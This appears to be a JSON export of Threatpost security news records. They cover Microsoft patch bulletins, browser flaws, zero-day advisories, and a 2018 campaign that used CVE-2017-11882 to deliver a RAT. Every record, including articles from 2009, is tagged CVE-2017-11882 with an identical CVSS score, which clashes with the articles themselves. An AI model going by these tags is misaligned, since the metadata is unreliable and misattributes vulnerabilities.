with exploit code earlier this week.\n", "cvss3": {}, "published": "2009-09-08T11:59:04", "type": "threatpost", "title": "Five Critical Bulletins Coming on MS Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:49", "id": "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "href": "https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/72234/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:43", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054206/broken_windows_shield.jpg)](<https://threatpost.com/windows-wins-attacks-wild-081909/>)The \u201ccritical\u201d WINS vulnerability that Microsoft issued a patch for last week is now being exploited actively in the wild, [according to the SANS Institute](<http://isc.sans.org/diary.html?storyid=6976>) [sans.org].\n\nThe Internet Storm Center (ISC), which is operated by SANS, is receiving preliminary reports that hackers are targeting Microsoft\u2019s WINS service on Windows NT, 2000 and 2003 servers. [Read the full story](<http://www.cio.com/article/499904/Windows_WINS_Attacks_in_the_Wild?source=rss_security>) [networkworld.com]\n", "cvss3": {}, "published": "2009-08-19T14:44:56", "type": "threatpost", "title": "Windows WINS Attacks In The Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:50", "id": "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "href": "https://threatpost.com/windows-wins-attacks-wild-081909/72957/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:44", "description": "[From Network World (Ellen Messmer)](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>)[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054215/ie8.jpg)](<https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/>)\n\nMicrosoft\u2019s Internet Explorer 8 rated tops among five browsers tested by NSS Labs for effectiveness in protecting against malware and phishing attacks \u2014 though NSS Labs acknowledges Microsoft paid for the tests.\n\nNevertheless, the test process, which lasted over a two-week period in July at the NSS Labs in Austin, evaluated the browsers based on access to live Internet sites and in theory could be duplicated elsewhere. Apple Safari 4, Google Chrome 2, Mozilla Firefox 3, and Opera 10 beta were evaluated as being behind Microsoft IE 8 when it comes to browser protection against phishing and malware, mainly because Microsoft was deemed more speedy and comprehensive in delivering updates about known phishing and malware to the user\u2019s desktop browser. [Read the full story](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>) [thestandard.com] Here\u2019s [a link to the study and results](<http://nsslabs.com/test-reports/NSS%20Labs%20Browser%20Security%20Test%20-%20Socially%20Engineered%20Malware.pdf>) [pdf from nsslabs.com]\n", "cvss3": {}, "published": "2009-08-14T16:33:17", "type": "threatpost", "title": "Microsoft IE 8 Shines in Web Browser Security Test", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "href": "https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/72970/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:51", "description": "![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054115/eric_schultze1.jpg)\n\nMicrosoft released six security bulletins today \u2014 three rated Critical and three rated Important. Two of the issues are being actively exploited on the Internet and four of the issues are client-side vulnerabilities, which means the exploit can only occur if a user visits an evil website or opens a malformed document.\n\nToday\u2019s release is important because patches were released for two recent 0-day attacks \u2013 a QuickTime file parsing vulnerability and the recently announced Directshow vulnerability. Both vulnerabilities are reported as being actively exploited on the Internet.\n\nWhile Microsoft has announced workarounds and/or provided Fixit tools for each of these issues, today\u2019s patches will be welcomed by network administrators who have been tasked with remediating these issues. I recommend that network administrators download and install the patches for these two bulletins as soon as possible (MS09-032 and MS09-028)\n\nTwo of Microsoft\u2019s other releases this month apply to products that you don\u2019t see patched very often \u2013 ISA Server 2006 and Virtual PC. Although these two products are associated with security functions, neither flaw is as bad as it seems and Microsoft has rated the severity for each of these as Important.\n\nOf the two remaining bulletins, one applies to Publisher (Important) and one applies to the Operating System (Critical). Neither of these issues were publicly known prior to release, though I recommend reviewing and installing each of these patches as appropriate on your networks. The Operating System patch (MS09-029) is particularly nasty and can execute when a user views an evil web page, email, or Office document.\n\nI recommend installing MS09-028, 29, and 32 patches first (DirectShow, OS Font patch, and Video Control). These are the three Critical patches \u2013 which goes to show that Microsoft got the Severity ratings spot-on this month.\n\n**Details for MS09-032 and MS09-028:**\n\nMS09-032 is the bulletin for the QuickTime file parsing vulnerability. Clicking on an evil hyperlink or even hovering your mouse over a malformed QuickTime file could allow the attacker to execute code on your system. The attacker\u2019s code would have the same level of permission to your computer as the person who is logged on to the computer. If you\u2019re logged on as admin, the exploit could add or remove users and administrators from your machine, delete files, reformat your hard drive, or embed trojans or worms that could be used in future attacks.\n\nIt\u2019s important to note for this issue that the presence or absence of Adobe QuickTime is not relevant to whether or not your computer is vulnerable to this issue. The flaw resides in the Microsoft components that parse QuickTime files \u2013 so don\u2019t believe that you\u2019re safe just because you don\u2019t have QuickTime installed. Also, the recent QuickTime patch from Adobe (7.6.2) is not related to this issue.\n\nMS09-032 is rated as Critical for all Operating Systems.\n\nMS09-028 is the bulletin for the recently announced Microsoft DirectShow vulnerability. Viewing a malformed media file from a Windows XP or Windows Server 2003 system can enable the attacker to execute code on your system. Similar to MS09-032, the evil code will run in the context of the currently logged on user and can take any action on that system that the logged on user can take.\n\nMicrosoft released a FixIt tool that sets the browser killbits for this vulnerable section of code. The MS09-032 patch is a cumulative killbit patch that includes the killbits from the FixIt tool as well as all previously released ActiveX killbits. Users who installed the ActiveX cumulative patch from June 2009 and also ran the FixIt tool for the DirectShow have already implemented the complete set of killbits reprented by the MS09-028 patch. If you ran the FixIt tool or otherwise implemented the Microsoft suggested workaround you are safe \u2013 there\u2019s no need to revert changes that you made.\n\nWhile the public exploit only impacts XP and 2003 systems, Microsoft recommends installing this patch on all Operating Systems as it includes killbits for all previously known bad ActiveX controls.\n\nDetails for the remaining four:\n\n**MS09-029** applies to all Operating Systems and could be a particularly nasty issue if left unpatched. The flaw resides in the way that Microsoft parses embedded fonts on web pages, emails, and Office documents. (in this case, embedded opentype fonts. EOT fonts ensure that everyone viewing the text sees it formatted the same way.) Viewing an evil web page, email, or Office doc could allow the attacker to execute code on your system. Workarounds are available, but it requires two separate changes to be made \u2013 one to protect from web content and the other to protect from evil emails and documents.\n\n**MS09-030** is a vulnerability in Microsoft Publisher documents. Viewing a malformed document could allow the attacker to run code on your system. This seems like the hundredth vulnerability in Publisher this year, and the millionth \u2018open an evil document and get hacked\u2019 vulnerability in the past two years.\n\n**MS09-031** discusses an issue with ISA Server 2006. If the ISA Server is specifically configured to use Radius one-time-passwords AND to use Kerberos for authentication AND to fallback to basic http authentication when asked, the attacker may be able to access servers protected by the firewall if they know the username of those target systems. It sounds scary, but it\u2019s probably a very small number of systems in the world that are configured exactly this way. An edge case at best. If you have an ISA Server 2006 and you\u2019re concerned that you might meet all three criteria above, it\u2019s best to patch your system. \n** \nMS09-033** relates to Guest Operating Systems that are hosted on Microsoft Virtual PC or Virtual Server. These virtualized systems are subject to a privilege escalation attack. (Non-virtualized systems are not vulnerable.) Users who can execute code on the virtual systems can run an exploit and become administrator on the virtual images. At no time can this flaw lead to compromise of the underlying Virtual PC or Virtual Server. IOW, it\u2019s not the much-hyped but yet-to-be-seen exploit that crosses the virtualization barrier.\n\n_* Eric Schultze is chief technology officer at Shavlik Technologies, a vulnerability management company._\n", "cvss3": {}, "published": "2009-07-14T19:02:19", "type": "threatpost", "title": "Inside Microsoft's July Security Patch Batch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T16:20:54", "id": "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "href": "https://threatpost.com/inside-microsofts-july-security-patch-batch-071409/72909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "[From InfoWorld (Roger Grimes)](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054024/microsoft_security.jpg)](<https://threatpost.com/microsoft-takes-lead-security-061909/>)Talk about a turnaround. It\u2019s always hard to recognize the larger, slow-moving paradigm shifts as they happen. But after a decade of bad press regarding its commitment to software security, Microsoft seems to have turned the tide. Redmond is getting consistent security accolades these days, often from the very critics who used to call it out. Many of the world\u2019s most knowledgeable security experts are urging their favorite software vendors to follow in the footsteps of Microsoft. Read the full story [[InfoWorld.com](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)].\n", "cvss3": {}, "published": "2009-06-19T18:13:35", "type": "threatpost", "title": "Microsoft Takes the Lead in Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "href": "https://threatpost.com/microsoft-takes-lead-security-061909/72854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:58", "description": "[From ZDNet (Ryan Naraine)](<http://blogs.zdnet.com/security/?p=3553>)\n\nMicrosoft\u2019s batch of patches this month is a big one: 10 bulletins covering a total of 31 documented vulnerabilities affecting the Windows OS, the Internet Explorer browser and the Microsoft Office productivity suite (Word, Works and Excel).\n\nFive of the 10 bulletins are rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Among the patches this month are fixes for [a pair of IIS WebDav flaws that were publicly disclosed](<http://blogs.zdnet.com/security/?p=3424>) last month and cover for the [CanSecWest Pwn2Own vulnerability](<http://blogs.zdnet.com/security/?p=2951>) that was used to exploit Internet Explorer on Windows 7. Read the full story [here](<http://blogs.zdnet.com/security/?p=3553>).\n", "cvss3": {}, "published": "2009-06-09T20:26:38", "type": "threatpost", "title": "Microsoft unleashes 31 fixes on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:09", "id": "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "href": "https://threatpost.com/microsoft-unleashes-31-fixes-patch-tuesday-060909/72724/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "[From Computerworld (Gregg Keizer)](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>)[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053720/2_touch.jpg)](<https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/>)\n\nAfter discovering attack code on a brand new Windows XP netbook, anti-virus vendor Kaspersky Labs warned users yesterday that they should scan virgin systems for malware before connecting them to the Internet.\n\nWhen Kaspersky developers installed their recently-released Security for Ultra Portables on an M&A Companion Touch netbook purchased for testing, \u201cthey thought something strange was going on,\u201d [said Roel Schouwenberg](<http://www.viruslist.com/en/weblog?weblogid=208187720>) [viruslist.com], a senior anti-virus researcher with the Moscow-based firm. Schouwenberg scanned the machine \u2014 a $499 netbook designed for the school market \u2014 and found three pieces of malware. [Read the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>) [computerworld.com]\n", "cvss3": {}, "published": "2009-05-19T15:38:56", "type": "threatpost", "title": "New Windows netbooks may harbor malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:14", "id": "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "href": "https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/72668/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:16", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053617/microsoft_99.jpg) \n](<https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/>)\n\nMicrosoft on Wednesday plans to launch a new research effort to determine the total cost of the patch-management cycle, from testing and distributing a fix to user deployment of the patch. The end result of the project, which will be completely open and transparent to outsiders, will be a full metrics model that the company plans to make freely available.\n\nThe metrics project will be handled by the analyst firm Securosis, which will do surveys and interviews with end users and will be responsible for building out the model. Rich Mogull, the firm\u2019s founder, said when Microsoft contacted him about the project he was encouraged by the open, product-neutral way in which the company wanted to approach it. \n\n\u201cThis is not a vendor tool. It\u2019s not product-focused at all,\u201d Mogull said. \u201cIt\u2019s focused on the organizations and the end users. We\u2019re looking at the patch management cycle. What are the total costs for the total cycle, from monitoring what you need to patch all the way to getting the patch out.\u201d\n\nAs part of the process, Securosis will be posting all of the correspondence between the firm and Microsoft about the project, inviting other vendors to participate and make suggestions and encouraging users to comment on the project as it progresses. Mogull said he hopes to have the first version of the model finished by the end of June.\n\nThe project is beng driven on Microsoft\u2019s end by Jeff Jones, a strategy director in the company\u2019s Security Technology Unit. Mogull said that he and Jones have talked at length about the transparency and objectivity requirements around the metrics model.\n\n\u201cOur research model is radically transparent and that\u2019s how this is going to be too,\u201d Mogull said. \u201cEverything will be out in the open. I wouldn\u2019t do something like this if it wasn\u2019t. The goal for the project is to produce an objective, independent model, irrespective of Microsoft.\u201d\n\nMogull has created a separate [Web page](<http://securosis.com/projectquant>) to discuss the project, which is where the materials related to the effort will be available once it gets underway. He lists the goals and deliverables of the effort, which he\u2019s calling Project Quant for now, and emphasizes the open and transparent nature of the project.\n\n\u201cAll materials will be made publicly available throughout the project, including internal communications (the Totally Transparent Research process). The model will be developed through a combination of primary research, surveys, focused interviews, and public/community participation,\u201d Mogull writes.\n\n*Composite header image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2009-04-15T11:45:37", "type": "threatpost", "title": "Microsoft to unveil patch management metrics project", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:21", "id": "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "href": "https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/72588/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053533/microsoft_office1.jpg)](<https://threatpost.com/microsoft-issues-powerpoint-zero-day-warning-040209/>)Microsoft has issued an advisory to warn about an under-attack zero-day vulnerability affecting its PowerPoint software.\n\nAccording to [the pre-patch advisory](<http://www.microsoft.com/technet/security/advisory/969136.mspx>), the flaw allows remote code execution if a user opens a booby-trapped PowerPoint file. The company described the attacks as \u201climited and targeted.\u201d\n\nAffected software:\n\nMicrosoft Office PowerPoint 2000 Service Pack 3 \nMicrosoft Office PowerPoint 2002 Service Pack 3 \nMicrosoft Office PowerPoint 2003 Service Pack 3 \nMicrosoft Office 2004 for Mac\n\nIn the absence of a fix, Microsoft [recommends](<http://www.microsoft.com/technet/security/advisory/969136.mspx>) the following workarounds:\n\n * Do not open or save Office files that you receive from un-trusted sources or that are received unexpectedly from trusted sources.\n * Do not open or save Office files that you receive from un-trusted sources or that are received unexpectedly from trusted sources. This vulnerability could be exploited when a user opens a file.\n * Use the Microsoft Office Isolated Conversion Environment (MOICE) when opening files from unknown or untrusted sources. \n * The Microsoft Office Isolated Conversion Environment (MOICE) will protect Office 2003 installations by more securely opening Word, Excel, and PowerPoint binary format files.\n * Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents from unknown or untrusted sources and locations.\n", "cvss3": {}, "published": "2009-04-02T23:35:53", "type": "threatpost", "title": "Microsoft issues PowerPoint zero-day warning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "href": "https://threatpost.com/microsoft-issues-powerpoint-zero-day-warning-040209/72535/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053333/microsoftsecurity1.jpg)](<https://threatpost.com/should-microsoft-be-security-business-031909/>)\n\nGartner security analyst Neil MacDonald thinks [there are five levels to the discussion](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) [gartner.com] about whether Microsoft should be in the security business. They include secure coding (obviously), secure functionality in the platform at no cost (of course), add-on security products at a fee (maybe) and paid cloud-based security services (sure).\n\nRead [the full blog post and take a stab at the questions](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) MacDonald poses.\n\nImage [via Wonderlane](<http://www.flickr.com/photos/wonderlane/1378294362/>) (Flickr CC 2.0)\n", "cvss3": {}, "published": "2009-03-19T15:18:05", "type": "threatpost", "title": "Should Microsoft be in the security business?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:36", "id": "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "href": "https://threatpost.com/should-microsoft-be-security-business-031909/72395/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-12T05:58:56", "description": "A series of espionage attacks have been uncovered, targeted at service centers in Russia that provide maintenance and support for a variety of electronic goods.\n\nThe payload is a commercial version of the [Imminent Monitor](<https://imminentmethods.net/features/>) tool, which is freely available for purchase as legitimate software. Its developers explicitly prohibit any usage of the tool in a malicious way \u2013 which bad actors are clearly ignoring.\n\nImminent Monitor includes two modules for recording video from a victim\u2019s webcam, along with three others that contain different spy and control functionalities, such as looking at file contents on the victim\u2019s machine.\n\n**A Long and Winding Kill Chain**\n\nFortiGuard Labs said that the multi-stage attacks use a whole bag of tricks to carry out their dirty work, including spoofed emails, malicious Office documents and a variety of unpacking techniques for Imminent Monitor, which functions as a remote access trojan (RAT).\n\nThe kill chain starts, as many attacks do, with fraudulent emails. In this case, they purport to be from Korean consumer electronics giant Samsung. FortiGuard researchers said that the nature of the mails suggests a targeted attack, not just a \u201cspray-and-pray\u201d random spam campaign.\n\n\u201cThe email was specifically sent to the service company that repairs Samsung\u2019s electronic devices,\u201d the firm said in [an analysis](<https://www.fortinet.com/blog/threat-research/non-russion-matryoshka-russian-service-centers-under-attack.html>) on Thursday, adding that the emails contain Excel files with the same naming convention that the targeted company uses in legitimate transactions.\n\nFurther, the spreadsheet files, which may have been lifted from a legitimate source, have been weaponized with an exploit for a vulnerability, CVE-2017-11882, in a 17-year-old piece of software.\n\n\u201cThe use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years,\u201d the team said. \u201cIt is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case.\u201d\n\nInterestingly, the vulnerability exists in an Office component called the Equation Editor (eqnedt32.exe), which allows users to insert mathematical and scientific equations into documents. It was kept around for compatibility reasons despite being flawed. Last year, Microsoft [manually patched](<https://blog.0patch.com/2017/11/did-microsoft-just-manually-patch-their.html>) a buffer overflow bug in it \u2014 the flaw used in these campaigns.\n\nRumors have gone around that choosing to patch the binary file rather than fixing the code itself suggests Microsoft lost the source code of the flawed feature, FortiGuard pointed out.\n\n\u201cThe malware authors clearly love this vulnerability because it allows them to achieve a stable exploitation across all current Windows platforms,\u201d the researchers said.\n\nFrom there, the exploit\u2019s shellcode takes a look at the export directory of the kernel32.dll on the targeted machine and locates the addresses of two key functions: LoadLibraryA and GetProcAddress. These are then used to obtain the addresses of the other necessary functions for the attack, including an important capability to determine the exact landing location for the payload, since this will vary, according to platform.\n\nFinally, the shellcode downloads the Imminent Monitor payload and then tries to execute it: The RAT is tucked into five different protective layers, including the ConfuserEx packer, which obfuscates objects names, as well as names of methods and resources, to make it hard to read and be understood by humans. ConfuserEx actually shows up twice; the second time, it includes a Rick-Rolling attempt.\n\nAnother packer used is the BootstrapCS executable, which performs anti-analysis checks; and eventually, for the final unpacking procedure of the RAT itself, the file uses the legit \u201clzma.dll\u201d library from 7Zip.\n\n**Not Their First Rodeo**\n\nEven though the emails are written in Russian, the attacks are coming from outside the country, carried out by a group known for other campaigns.\n\nThe analysts said that it\u2019s \u201chighly unlikely\u201d that a native Russian speaker wrote the email text, but rather, it seems to be run through a translator. Also, even though the \u201cfrom\u201d address appears to be Russian in origin, an examination of the headers revealed that IP address of the sender isn\u2019t related to the email address\u2019 domain.\n\nAlso, in analyzing the C2 servers used in the attacks, FortiGuard found, based on the registrant data, that 50 domains were all registered on the same day.\n\n\u201cSome of these domains have already been used for malware spreading,\u201d the firm said. \u201cAnother group was linked to the phishing campaigns.\u201d\n\nFortiGuard also searched its collection of samples and found several spreadsheet samples that use the same C2 servers as the samples from these attacks.\n\n\u201cThe samples are older and use different vulnerabilities,\u201d the researchers said. \u201cWe believe that this same group of attackers are behind both groups of samples.\u201d\n\nWhile it\u2019s unclear who exactly is behind the attacks, it\u2019s clear that this campaign is not the first \u2013 and will probably not be the last \u2013 for the bad actors.\n", "cvss3": {}, "published": "2018-06-07T19:43:35", "type": "threatpost", "title": "Targeted Spy Campaign Hits Russian Service Centers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-06-07T19:43:35", "id": "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "href": "https://threatpost.com/targeted-spy-campaign-hits-russian-service-centers/132639/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:06:31", "description": "Microsoft has pushed out a new release candidate of Internet Explorer 9 that includes two new privacy protections designed to enable consumers to prevent tracking by some Web sites.\n\nThe new [IE 9 release candidate](<http://blogs.msdn.com/b/ie/archive/2010/12/07/ie9-and-privacy-introducing-tracking-protection-v8.aspx>) has two separate, but related, technologies aimed at giving users more control over how sites track them and what data is sent back to the site\u2019s owners: Tracking Protection and Tracking Protection Lists. The functionality allows user to specify exactly which sites they will allow to track them to some extent and enables sites to publish lists that show consumers what information might be collected.\n\nThe announcement by Microsoft comes in the midst of a complex discussion among lawmakers, regulators and privacy advocates about whether a national \u201cDo-Not Track\u201d list for browsers is desirable or even feasible. The [Federal Trade Commission recently proposed such a list](<https://threatpost.com/ftc-pushes-do-not-track-option-web-browsers-120110/>) in a report it released on privacy issues. Microsoft officials said that they were interested in finding a way to answer some of the same questions raised by the FTC.\n\n\u201cWe believe that the combination of consumer opt-in, an open platform for \npublishing of Tracking Protection Lists (TPLs), and the underlying \ntechnology mechanism for Tracking Protection offer new options and a \ngood balance between empowering consumers and online industry needs. \nThey further empower consumers and complement many of the other ideas \nunder discussion,\u201d Dean Hachamovitch, corporate vice president for IE at Microsoft wrote in a blog post about the new features. \u201cWhile \u2018Do not track\u2019 is a meaningful consumer promise around data use, the web lacks a good precise definition of [what tracking means](<http://www.research-live.com/ftc-chief-says-do-not-track-idea-is-still-on-the-table/4003244.article>). \nUntil we get there, we can make progress by providing consumers with a \nway to limit or control the data collected about them on sites they \ndon\u2019t visit directly. That kind of control is already technically \nfeasible today [in a variety of ways](<http://blogs.msdn.com/b/ie/archive/2010/11/30/selectively-filtering-content-in-web-browsers.aspx>). \nIt is important to understand that the feature design makes no judgment \nabout how information might be used. Rather, it provides the means for \nconsumers to opt-out of the release of that information in the first \nplace.\u201d\n\nThe new privacy mechanisms in IE 9 will be opt-in, so users will need to make conscious decisions about what sites they are blocking and which they are allowing to track them. Users will be able to manually add specific sites to the Tracking Protection mechanism and also can add Tracking Protection Lists published by various Web sites to their browsers. The TPLs will include URLs that the user only wants IE to call out to if the user actually types the address into the browser or clicks on a link to the site. \n\n\u201cIn addition to \u2018Do Not Call\u2019 entries that prevent information \nrequests to some web addresses, lists can include \u2018OK to Call\u2019 entries \nthat permit calls to specific addresses. In this way, a consumer can \nmake exceptions to restrictions on one list easily by adding another \nlist that includes \u2018OK to Call\u2019 overrides for particular addresses,\u201d Hachamovitch wrote. \u201cWe \ndesigned this feature so that consumers have a clear, straight forward, \nopt-in mechanism to enable a higher degree of control over sharing \ntheir browsing information AND websites can provide easy to use lists to \nmanage their privacy as well as experience full-featured sites.\u201d\n", "cvss3": {}, "published": "2010-12-07T20:00:18", "type": "threatpost", "title": "Microsoft Adds Tracking Protection to IE 9", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:34", "id": "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "href": "https://threatpost.com/microsoft-adds-tracking-protection-ie-9-120710/74747/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060228/ie_target.png)](<https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/>)There\u2019s a new flaw in all of the current versions of Internet Explorer that is being used in some targeted attacks right now. Microsoft has confirmed the bug and said it is working on a fix, but has no timeline for the patch release yet. The company did not rule out an emergency out-of-band patch, however.\n\nThe new bug in Internet Explorer affects versions 6, 7 and 8, but is not present in IE 9 beta releases, Microsoft said. The company has released an [advisory on the IE vulnerability](<https://www.microsoft.com/technet/security/advisory/2458511.mspx>) and says that some of the exploit protections it has added to recent versions of IE and Windows can help protect against attacks on the bug. Microsoft said that IE 8 running on Windows XP SP 3 and later versions of Windows has DEP (Data Execution Prevention) enabled by default, which helps stop attacks against this specific bug. IE running in Protected Mode also helps mitigate the effects of attacks.\n\n\u201cThe vulnerability exists due to an invalid flag reference within \nInternet Explorer. It is possible under certain conditions for the \ninvalid flag reference to be accessed after an object is deleted. In a \nspecially-crafted attack, in attempting to access a freed object, \nInternet Explorer can be caused to allow remote code execution.\n\n\u201cAt \nthis time, we are aware of targeted attacks attempting to use this \nvulnerability. We will continue to monitor the threat environment and \nupdate this advisory if this situation changes. On completion of this \ninvestigation, Microsoft will take the appropriate action to protect our \ncustomers, which may include providing a solution through our monthly \nsecurity update release process, or an out-of-cycle security update, \ndepending on customer needs,\u201d Microsoft said in its advisory.\n\nThe new IE flaw is likely to be targeted through drive-by download attacks, a common attack scenario for browser vulnerabilities. \n\n\u201cIn a Web-based attack scenario, an attacker could host a Web site that \ncontains a Web page that is used to exploit this vulnerability. In \naddition, compromised Web sites and Web sites that accept or host \nuser-provided content or advertisements could contain specially crafted \ncontent that could exploit this vulnerability. In all cases, however, an \nattacker would have no way to force users to visit these Web sites. \nInstead, an attacker would have to convince users to visit the Web site, \ntypically by getting them to click a link in an e-mail message or \nInstant Messenger message that takes users to the attacker\u2019s Web site,\u201d Microsoft said.\n", "cvss3": {}, "published": "2010-11-03T16:03:17", "type": "threatpost", "title": "New Bug in Internet Explorer Used in Targeted Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:16:08", "id": "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "href": "https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/74636/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07060041/asp-net2.jpg)](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>)Microsoft is warning customers that it has seen ongoing attacks against the recently disclosed padding oracle [vulnerability in ASP.NET](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) and is encouraging them to [implement a workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that will help protect against the publicly disclosed exploit for the bug.\n\nThe [workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that Microsoft has developed causes ASP.NET applications to return the same error message, regardless of what the actual error it encounters is. This prevents the server from sending error messages to the attacker that might give him important information about what error was caused on the application.\n\n\u201cA workaround you can use to prevent this \nvulnerability is to enable the <customErrors> feature of ASP.NET, \nand explicitly configure your applications to always return the same error page \n\u2013 regardless of the error encountered on the server. By mapping all \nerror pages to a single error page, you prevent a hacker from \ndistinguishing between the different types of errors that occur on a \nserver**,**\u201d Microsoft\u2019s Scott Guthrie said in a blog post explaining the wrokaround. \u201c**Important**: It is not enough to \nsimply turn on CustomErrors or have it set to RemoteOnly. You also need \nto make sure that all errors are configured to return the same error \npage. This requires you to explicitly set the 